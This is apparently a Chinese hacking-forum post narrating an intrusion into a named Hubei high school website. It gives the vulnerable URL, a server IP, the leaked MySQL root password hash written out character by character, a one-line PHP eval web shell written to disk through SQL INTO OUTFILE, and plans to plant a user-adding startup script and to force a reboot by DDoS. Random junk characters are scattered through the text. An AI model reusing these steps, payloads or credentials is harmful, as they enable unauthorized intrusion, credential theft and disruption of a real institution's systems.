友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
  J  n/ x, S: m9 o* i. _% O/ X$ o发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
+ s4 a# [, W  w  y

/ Y  \  X7 Z* P& p1 Y) n. x
: Y5 |$ f9 D8 `# t) C常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
3 [. s) L. W: P& _5 R5 T+ C* q( W
3 {" ^' L) u. ^- n那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
0 |7 d3 ^+ z+ j, h
; ~' Q; u7 x, i+ A: X1 v- U2 }试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
* j: d% Z; s: J2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
' ~2 U" |0 M1 c5./phpmyadmin/libraries/select_lang.lib.php  
: o" U$ _0 k9 s! R5 d( a) |6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
% }' d7 `! ?! }/ L' ^% y5 u
5 A" w1 E4 J$ A# t) Q" f均不行...........................

7 d1 o  @+ b1 Q7 l) n- W御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
. ]9 j3 K5 R3 X* G! C
. m9 E; ^$ M/ o权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
* a3 Z, r3 \6 y& @$ ]# o7 X
$ H3 M2 L" ~4 @+ {# U, \# K) S默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
" Z0 m  n; F: f( c  H! C4 g
- z+ x/ i. ]" A7 b, P敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

5 F0 Q3 A! r! k" Y# L+ }想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

# Y5 C$ G! n6 b; }7 [成功读到root密码：
# f! \. O, Y* ?8 ?- d8 z: P( _$ g
: |% L1 X0 ^1 ^) ~; i17---- r(0072)
' ~* _8 z! {+ n7 w+ ]4 ]7 `18---- o(006f)
+ J  M8 ~* S( t9 b9 S# _. o/ ]19---- o(006f)
20---- t(0074)
2 c- D' K6 A5 M9 J4 ?21---- *(002a)
- G9 I+ w# Q9 [0 h  f22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
3 ~8 i/ i& g/ a( w& T* K) z1 L27---- 5(0035)
28---- 8(0038)
" s& i) N, Z" u* v3 }9 m29---- 2(0032)
30---- 8(0038)
9 i# k# U4 X5 B. K31---- A(0041)
32---- 9(0039)
/ \8 N" V2 V& ]$ v9 H+ P8 I2 |+ n# G4 A33---- B(0042)
4 t/ K7 |+ y: s! y& r+ A/ c34---- 5(0035)
  S8 |" ~3 `3 d+ B35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
+ }7 q3 C8 {4 H5 g38---- 4(0034)
2 Z+ n* O3 S- ~39---- 9(0039)
40---- 1(0031)
4 o! o9 T5 m& G9 d1 f% l% k+ E41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
* C' b" n* |  G' M  V+ n" ^. B; _  q46---- 8(0038)
47---- F(0046)
9 e, R/ ?# s1 c# t48---- F(0046)
49---- 4(0034)
50---- F(0046)
5 r( V* a& K# Z5 ]51---- 0(0030)
: `- D! g: J1 F52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
  f( ?% e. n  M: ]60---- *(0041)
4 f. h9 ^/ |# Z5 [- `61---- *0032)

解密后成功登陆phpmyamin
; x4 F( I9 x' _; J. c                          
# }' Y7 G) S8 X6 K% V
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
, W% b$ y. a0 t& n/ h( `
0 j9 F2 f  P  a& [( e9 O- t, F成功执行，拿下shell，菜刀连接：

3 X  Z9 `0 R; ~5 y# `, b服务器不支持asp,aspx,php提权无果...................
# M) c( y' G8 u% t( \
, z, |; ~5 Q4 q- J7 D但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

, W6 \) \4 G% b, T% _

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
$ L! A  [7 a4 a0 I) k; ]$ K8 K
; s1 T$ p3 J  ]! H4 oddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel